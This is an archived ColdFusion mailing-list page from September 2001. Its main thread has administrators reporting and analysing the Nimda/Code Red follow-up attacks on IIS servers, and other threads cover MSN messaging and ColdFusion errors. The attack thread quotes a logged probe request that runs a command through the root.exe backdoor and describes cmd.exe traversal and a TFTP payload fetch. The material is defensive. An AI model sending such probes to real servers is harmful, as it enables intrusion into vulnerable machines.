>From what I have found, MSN is not too friendly when it comes to sending
messages unless you use their client software. I know Yahoo, AIM, and ICQ
all have a way that you can use HTML to send a message to users.

Thank you,

Dan Phillips
Lead Support Technician/ColdFusion Administrator
Express Technologies, Inc.
dba CFXhosting.com



-Original Message-
From: Rey Bango [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: CF-Talk
Subject: Re: MSN


AFAIK, they have no API for that. If you find it, please let me know. I've
been wanting to add the functionality myself.

Rey...

- Original Message -
From: "webmaster" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:49 AM
Subject: MSN


> Does anyone know how to send a MSN message from a CF app ?
>
>
> TIA
>
> Richard
>
>



~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: Code Red backdoor triggered?

2001-09-18 Thread webmaster


we're seeing a HUGE number of hits all containing :-
port=3641 probes and  URL=/c/winnt/system32/cmd.exe attempts and guess where
they're coming from ?
the exact same machines that rountinly have been doing the code red thing .

Damn




 Message -
From: "Paris Lundis" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 8:02 AM
Subject: RE: Code Red backdoor triggered?


> Uggh! not the code-red variations again...
>
> Can you tell us Rich if it is impacting the servers ?? Are  you
> patched, and does this thing use something new or is it the same
> exploit as before...
>
> Seems like it is becoming a net-30 terror :)
>
> -paris
> [finding the future in the past, passing the future in the present]
> [connecting people, places and things]
>
>
> -Original Message-
> From: Rich Wild <[EMAIL PROTECTED]>
> Date: Tue, 18 Sep 2001 15:37:13 +0100
> Subject: RE: Code Red backdoor triggered?
>
> > even we're getting hammered with syn flood attacks.
> >
> > Rich Wild
> >
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: 18 September 2001 15:52
> > > To: CF-Talk
> > > Subject: FW: Code Red backdoor triggered?
> > >
> > >
> > > It seems there may be some unusual network activity today
> > > worth noting.
> > >
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > >
> > >
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: Tuesday, 18 September, 2001 10:49
> > > To: [EMAIL PROTECTED]
> > > Subject: RE: Code Red backdoor triggered?
> > >
> > >
> > > > Heads up. Pay attention to your servers today. I just
> > > > started detecting a *ton* of these requests. I think it's
> > > > a follow-up worm programmed to take advantage of the
> > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > Code Red III?
> > > >
> > > > -Cameron
> > > >
> > > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > > dhcp181.onewebsystems.com
> > > > (130.205.102.181) on port 80 (tcp).
> > > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > Host: www
> > > > Connnection: close
> > >
> > > After a more careful reading, I don't think this is an attack
> > > at all. I
> > > think it's worse than an attack.
> > >
> > > The GET request doesn't do anything except run the DOS dir
> > > command using the
> > > command processor. But, if a server responds with an HTTP 200
> > > status code,
> > > this indicates that the server is vulnerable to running
> > > cmd.exe through the
> > > web server.
> > >
> > > So, my guess is that this is a vulnerability scan. Once a
> > > list of vulnerable
> > > servers is compiled, a real attack would take much less time
> > > than a Code
> > > Red-style attack, since you could build the list of
> > > vulnerable servers into
> > > the attack code!
> > >
> > > This idea has been discussed a bit in the last month or so -
> > > it's called a
> > > "Warhol" worm, the idea being that an attack might cover the mass
> > of
> > > vulnerable machines in fifteen minutes. Here's a URL to the
> > article:
> > >
> > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > 5&mode=nocomme
> > nt&threshold=
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> > -
> > ---
> > 
> > Control your subscriptions to ACFUG lists via the ACFUG website at
> >
> >
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

FW: Alert: Some sort of IIS worm seems to be propagating

2001-09-18 Thread Jay Sudowski - Handy Networks LLC

-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 11:21 AM
To: [EMAIL PROTECTED]
Subject: Alert: Some sort of IIS worm seems to be propagating

-BEGIN PGP SIGNED MESSAGE-

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected" machines
are using a wide variety of attacks which attempt to exploit already
known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no text
in this message when it is displayed by Outlook when in Auto-Preview
mode (always a good indication there's something not quite right with an
email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous other
known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a file
called ADMIN.DLL from (presumably) some previously compromised box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL in
the /scripts directory), please forward me a copy of that .dll ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the
following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows
File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIOhSW7yN2lhJ=
=YAwc
-END PGP SIGNATURE-

Delivery co-sponsored by Trend Micro, 
Inc.
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail
for Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
ScanMail ensures 100% inbound and outbound email virus scanning and
provides remote software management. Download a FREE 30-day trial copy
of ScanMail and find out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/sme
x2000=
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

FW: Alert: Some sort of IIS worm seems to be propagating

2001-09-18 Thread Dave Watts


I just got this.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 18 September, 2001 11:21
To: [EMAIL PROTECTED]
Subject: Alert: Some sort of IIS worm seems to be propagating


-BEGIN PGP SIGNED MESSAGE-

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-END PGP SIGNATURE-


Delivery co-sponsored by Trend Micro, Inc.

TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

FW: Code Red backdoor triggered?

2001-09-18 Thread Dave Watts


More on the .eml files.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


-Original Message-
From: Dave Watts 
Sent: Tuesday, 18 September, 2001 11:25
To: '[EMAIL PROTECTED]'
Subject: RE: Code Red backdoor triggered?


> It looks like when you surf to an infected site, it opens IE 
> with a file named readme.eml which appears to contain a readme.exe.  
> I don't have an email client on the server so I dont know what 
> would happen if I did and I am not going to test it out. I 
> also see a number (at least 10 - haven't counted yet) of 
> different sites sending out requests, and interestingly they 
> are all in the same subnet: my ip is 209.186.186.37 and they 
> are all from 209.x.x.x

I just checked the logfile for one virtual server here, and I'm getting lots
of attacks from similar network addresses. I used a command-line HTTP
browser to connect to one of the attacking IPs, and saw the same
"readme.eml" thing, at the bottom of what appeared to be a regular page.

Based on my reading of the logfile, I think this is some Code Red variant or
followup; it's using the Code Red-specific backdoors mentioned in the
incidents.org URL Cameron posted. The only thing that doesn't sound right to
me is that I thought the Code Red trojan payload only worked with Win2K
(simply crashing IIS on NT 4), but several of the attacking servers are
identifying themselves as IIS 4.

Dave Watts, CTO, Fig Leaf Software 
http://www.figleaf.com/ 
voice: (202) 797-5496 
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Need help with error message.

2001-09-18 Thread Chris Bohill


Can anyone explain why I am getting this error message, when trying to
encrypt and decrypt details passed through pages as URL's.


Error Occurred While Processing Request Error Diagnostic Information Anerror occurred 
while evaluating the expression: CI=
Decrypt(ToString(ToBinary(URL.Card_Id)),secret_key) Error near line 19,
column 10. 

The value to be decrypted is not valid The error occurred while
processing an element with a general identifier of (CFSET), occupying
document position (19:4) to (19:67).

Thanks,

Chris.

   Chris Bohill 
   WEB APPLICATIONS DEVELOPER

  Biznet 
Head Office 
133-137 Lisburn Road, Belfast 
Northern Ireland BT9 7AG 
T  +44 (0) 28 9022 3224 
F  +44 (0) 28 9022 3223 
E  [EMAIL PROTECTED]
 
W  biznet-solutions.com  

 


**

If you are not the intended recipient, or person responsible for
delivering it to the intended recipient, you are not authorized

to and must not disclose, copy, distribute or retain this message or any
part of it. 

The opinions / views / comments on this e-mail do not necessarily
reflect any views or policies of biznet

The recipient should check this email and any attachments for the
presence of viruses. biznet accepts no liability for any damage caused
by any virus transmitted by this email. biznet 2001.


**

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Rich Wild


we have loads of *.eml files, but they're just bad emails from the
mailspool, nothing to worry about.

> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 17:02
> To: CF-Talk
> Subject: RE: Code Red backdoor triggered?
> 
> 
> Check for *.eml files on your IIS boxes, we got them 
> everywhere...and our
> virus software is not picking anything up at all...
> 
> 
> 
> -Original Message-
> From: Rich Wild [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 9:37 AM
> To: CF-Talk
> Subject: RE: Code Red backdoor triggered?
> 
> 
> even we're getting hammered with syn flood attacks.
> 
> Rich Wild
> 
> > -Original Message-
> > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 15:52
> > To: CF-Talk
> > Subject: FW: Code Red backdoor triggered?
> >
> >
> > It seems there may be some unusual network activity today
> > worth noting.
> >
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> >
> >
> > -Original Message-
> > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, 18 September, 2001 10:49
> > To: [EMAIL PROTECTED]
> > Subject: RE: Code Red backdoor triggered?
> >
> >
> > > Heads up. Pay attention to your servers today. I just
> > > started detecting a *ton* of these requests. I think it's
> > > a follow-up worm programmed to take advantage of the
> > > backdoors Code Red dropped on infected computers. Maybe a
> > > Code Red III?
> > >
> > > -Cameron
> > >
> > > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > > dhcp181.onewebsystems.com
> > > (130.205.102.181) on port 80 (tcp).
> > > [09/18/2001 09:25:55.166 GMT-0400] GET
> > > /scripts/root.exe?/c+dir HTTP/1.0
> > > Host: www
> > > Connnection: close
> >
> > After a more careful reading, I don't think this is an attack
> > at all. I
> > think it's worse than an attack.
> >
> > The GET request doesn't do anything except run the DOS dir
> > command using the
> > command processor. But, if a server responds with an HTTP 200
> > status code,
> > this indicates that the server is vulnerable to running
> > cmd.exe through the
> > web server.
> >
> > So, my guess is that this is a vulnerability scan. Once a
> > list of vulnerable
> > servers is compiled, a real attack would take much less time
> > than a Code
> > Red-style attack, since you could build the list of
> > vulnerable servers into
> > the attack code!
> >
> > This idea has been discussed a bit in the last month or so -
> > it's called a
> > "Warhol" worm, the idea being that an attack might cover the mass of
> > vulnerable machines in fifteen minutes. Here's a URL to the article:
> >
> > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> 5&mode=nocomme
> nt&threshold=
> 
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
> --
> --
> 
> Control your subscriptions to ACFUG lists via the ACFUG website at
> 
> 
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Rich Wild


> Can you tell us Rich if it is impacting the servers ??

nah - filling up firewall but nothing else.

Are  you 
> patched, and does this thing use something new or is it the same 
> exploit as before...

Yeah - we're patched

dunno - we never got hit before.

> -Original Message-
> From: Paris Lundis [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 16:03
> To: CF-Talk
> Subject: RE: Code Red backdoor triggered?
> 
> 
> Uggh! not the code-red variations again...
> 
> Can you tell us Rich if it is impacting the servers ?? Are  you 
> patched, and does this thing use something new or is it the same 
> exploit as before...
> 
> Seems like it is becoming a net-30 terror :)
> 
> -paris
> [finding the future in the past, passing the future in the present]
> [connecting people, places and things]
> 
> 
> -Original Message-
> From: Rich Wild <[EMAIL PROTECTED]>
> Date: Tue, 18 Sep 2001 15:37:13 +0100
> Subject: RE: Code Red backdoor triggered?
> 
> > even we're getting hammered with syn flood attacks.
> > 
> > Rich Wild
> > 
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: 18 September 2001 15:52
> > > To: CF-Talk
> > > Subject: FW: Code Red backdoor triggered?
> > > 
> > > 
> > > It seems there may be some unusual network activity today 
> > > worth noting.
> > > 
> > > Dave Watts, CTO, Fig Leaf Software
> > > http://www.figleaf.com/
> > > voice: (202) 797-5496
> > > fax: (202) 797-5444
> > > 
> > > 
> > > -Original Message-
> > > From: Dave Watts [mailto:[EMAIL PROTECTED]]
> > > Sent: Tuesday, 18 September, 2001 10:49
> > > To: [EMAIL PROTECTED]
> > > Subject: RE: Code Red backdoor triggered?
> > > 
> > > 
> > > > Heads up. Pay attention to your servers today. I just 
> > > > started detecting a *ton* of these requests. I think it's 
> > > > a follow-up worm programmed to take advantage of the 
> > > > backdoors Code Red dropped on infected computers. Maybe a
> > > > Code Red III?
> > > > 
> > > > -Cameron
> > > > 
> > > > [09/18/2001 09:25:55.136 GMT-0400] Connection: 
> > > > dhcp181.onewebsystems.com
> > > > (130.205.102.181) on port 80 (tcp).
> > > > [09/18/2001 09:25:55.166 GMT-0400] GET 
> > > > /scripts/root.exe?/c+dir HTTP/1.0
> > > > Host: www
> > > > Connnection: close
> > > 
> > > After a more careful reading, I don't think this is an attack 
> > > at all. I
> > > think it's worse than an attack.
> > > 
> > > The GET request doesn't do anything except run the DOS dir 
> > > command using the
> > > command processor. But, if a server responds with an HTTP 200 
> > > status code,
> > > this indicates that the server is vulnerable to running 
> > > cmd.exe through the
> > > web server.
> > > 
> > > So, my guess is that this is a vulnerability scan. Once a 
> > > list of vulnerable
> > > servers is compiled, a real attack would take much less time 
> > > than a Code
> > > Red-style attack, since you could build the list of 
> > > vulnerable servers into
> > > the attack code!
> > > 
> > > This idea has been discussed a bit in the last month or so - 
> > > it's called a
> > > "Warhol" worm, the idea being that an attack might cover the mass
> > of
> > > vulnerable machines in fifteen minutes. Here's a URL to the
> > article:
> > > 
> > > http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
> > 5&mode=nocomme
> > nt&threshold=
> > 
> > Dave Watts, CTO, Fig Leaf Software
> > http://www.figleaf.com/
> > voice: (202) 797-5496
> > fax: (202) 797-5444
> > 
> -
> > ---
> > 
> > Control your subscriptions to ACFUG lists via the ACFUG website at
> > 
> > 
> 
~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Jay Sudowski - Handy Networks LLC


Gr.  We're getting hammered with something across three of our
servers. Data transfer is up 600% compared to normal.

Today is gonna be one of those days ...



-Original Message-
From: Rich Wild [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 10:37 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


even we're getting hammered with syn flood attacks.

Rich Wild

> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:52
> To: CF-Talk
> Subject: FW: Code Red backdoor triggered?
> 
> 
> It seems there may be some unusual network activity today
> worth noting.
> 
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
> 
> 
> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, 18 September, 2001 10:49
> To: [EMAIL PROTECTED]
> Subject: RE: Code Red backdoor triggered?
> 
> 
> > Heads up. Pay attention to your servers today. I just
> > started detecting a *ton* of these requests. I think it's 
> > a follow-up worm programmed to take advantage of the 
> > backdoors Code Red dropped on infected computers. Maybe a
> > Code Red III?
> > 
> > -Cameron
> > 
> > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > dhcp181.onewebsystems.com
> > (130.205.102.181) on port 80 (tcp).
> > [09/18/2001 09:25:55.166 GMT-0400] GET 
> > /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
> 
> After a more careful reading, I don't think this is an attack
> at all. I
> think it's worse than an attack.
> 
> The GET request doesn't do anything except run the DOS dir
> command using the
> command processor. But, if a server responds with an HTTP 200 
> status code,
> this indicates that the server is vulnerable to running 
> cmd.exe through the
> web server.
> 
> So, my guess is that this is a vulnerability scan. Once a
> list of vulnerable
> servers is compiled, a real attack would take much less time 
> than a Code
> Red-style attack, since you could build the list of 
> vulnerable servers into
> the attack code!
> 
> This idea has been discussed a bit in the last month or so -
> it's called a
> "Warhol" worm, the idea being that an attack might cover the mass of
> vulnerable machines in fifteen minutes. Here's a URL to the article:
> 
> http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
5&mode=nocomment&threshol=

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444



Control your subscriptions to ACFUG lists via the ACFUG website at


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

Re: CF eating up RAM

2001-09-18 Thread Chris Norloff


Is 22MB a problem on your system?  That doesn't sound bad to me.

Does it plateau at 22MB at 18 days, or does it keep increasing? If it kept increasing, 
that would be a problem.

Chris Norloff

-- Original Message --
From: "nyon" <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Date: Tue, 18 Sep 2001 10:48:20 +0800

>Hi,
>
>I notice that the cold fusion service is slowly eating up my RAM. After 18
>days, it consumes about 22MB of RAM from a lowly figure of
>5MB. I have installed service pack for CF 4.5.1.
>
>Any solutions ?
>Nyon
>
>FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
>Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
>Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread Dennis Powers


I believe that the MSN Messenger uses a UDP protocol to communicate. If so
you might be able to use the IntraFoundation UDPClient FREEWARE COM Object.

http://www.intrafoundation.com/udpclient.html




Best regards,

Dennis Powers
UXB Internet
(203)879-2844
http://www.uxbinfo.com/

-Original Message-
From: webmaster [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:50 AM
To: CF-Talk
Subject: MSN

Does anyone know how to send a MSN message from a CF app ?


TIA

Richard


~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread BT

how can you send it to AIM?

-Original Message-
From: Dan Phillips [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:05 AM
To: CF-Talk
Subject: RE: MSN

>From what I have found, MSN is not too friendly when it comes to sending
messages unless you use their client software. I know Yahoo, AIM, and ICQ
all have a way that you can use HTML to send a message to users.

Thank you,

Dan Phillips
Lead Support Technician/ColdFusion Administrator
Express Technologies, Inc.
dba CFXhosting.com

-Original Message-
From: Rey Bango [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: CF-Talk
Subject: Re: MSN

AFAIK, they have no API for that. If you find it, please let me know. I've
been wanting to add the functionality myself.

Rey...

- Original Message -
From: "webmaster" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:49 AM
Subject: MSN

> Does anyone know how to send a MSN message from a CF app ?
>
>
> TIA
>
> Richard
>
>

~~
Your ad could be here. Monies from ads go to support these lists and provide more 
resources for the community. http://www.fusionauthority.com/ads.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: Code Red backdoor triggered?

2001-09-18 Thread Carlisle, Eric


I'll show my ignorance.
A .eml file is a kind of MS spool file, right?
Does the virus pose as one of these files?

EC

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:02 PM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


Check for *.eml files on your IIS boxes, we got them everywhere...and our
virus software is not picking anything up at all...



-Original Message-
From: Rich Wild [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:37 AM
To: CF-Talk
Subject: RE: Code Red backdoor triggered?


even we're getting hammered with syn flood attacks.

Rich Wild

> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:52
> To: CF-Talk
> Subject: FW: Code Red backdoor triggered?
>
>
> It seems there may be some unusual network activity today
> worth noting.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> voice: (202) 797-5496
> fax: (202) 797-5444
>
>
> -Original Message-
> From: Dave Watts [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, 18 September, 2001 10:49
> To: [EMAIL PROTECTED]
> Subject: RE: Code Red backdoor triggered?
>
>
> > Heads up. Pay attention to your servers today. I just
> > started detecting a *ton* of these requests. I think it's
> > a follow-up worm programmed to take advantage of the
> > backdoors Code Red dropped on infected computers. Maybe a
> > Code Red III?
> >
> > -Cameron
> >
> > [09/18/2001 09:25:55.136 GMT-0400] Connection:
> > dhcp181.onewebsystems.com
> > (130.205.102.181) on port 80 (tcp).
> > [09/18/2001 09:25:55.166 GMT-0400] GET
> > /scripts/root.exe?/c+dir HTTP/1.0
> > Host: www
> > Connnection: close
>
> After a more careful reading, I don't think this is an attack
> at all. I
> think it's worse than an attack.
>
> The GET request doesn't do anything except run the DOS dir
> command using the
> command processor. But, if a server responds with an HTTP 200
> status code,
> this indicates that the server is vulnerable to running
> cmd.exe through the
> web server.
>
> So, my guess is that this is a vulnerability scan. Once a
> list of vulnerable
> servers is compiled, a real attack would take much less time
> than a Code
> Red-style attack, since you could build the list of
> vulnerable servers into
> the attack code!
>
> This idea has been discussed a bit in the last month or so -
> it's called a
> "Warhol" worm, the idea being that an attack might cover the mass of
> vulnerable machines in fifteen minutes. Here's a URL to the article:
>
> http://hacktivism.openflows.org/article.pl?sid=01/08/13/123724
5&mode=nocomme
nt&threshold=

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444


Control your subscriptions to ACFUG lists via the ACFUG website at



~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: CF eating up RAM

2001-09-18 Thread Neil Clark


also check your Mail stack/log

~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists

RE: MSN

2001-09-18 Thread Dan Phillips


>From what I have found, MSN is not too friendly when it comes to sending
messages unless you use their client software. I know Yahoo, AIM, and ICQ
all have a way that you can use HTML to send a message to users.

Thank you,

Dan Phillips
Lead Support Technician/ColdFusion Administrator
Express Technologies, Inc.
dba CFXhosting.com



-Original Message-
From: Rey Bango [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: CF-Talk
Subject: Re: MSN


AFAIK, they have no API for that. If you find it, please let me know. I've
been wanting to add the functionality myself.

Rey...

- Original Message -
From: "webmaster" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 10:49 AM
Subject: MSN


> Does anyone know how to send a MSN message from a CF app ?
>
>
> TIA
>
> Richard
>
>

~~
Get the mailserver that powers this list at http://www.coolfusion.com
FAQ: http://www.thenetprofits.co.uk/coldfusion/faq
Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
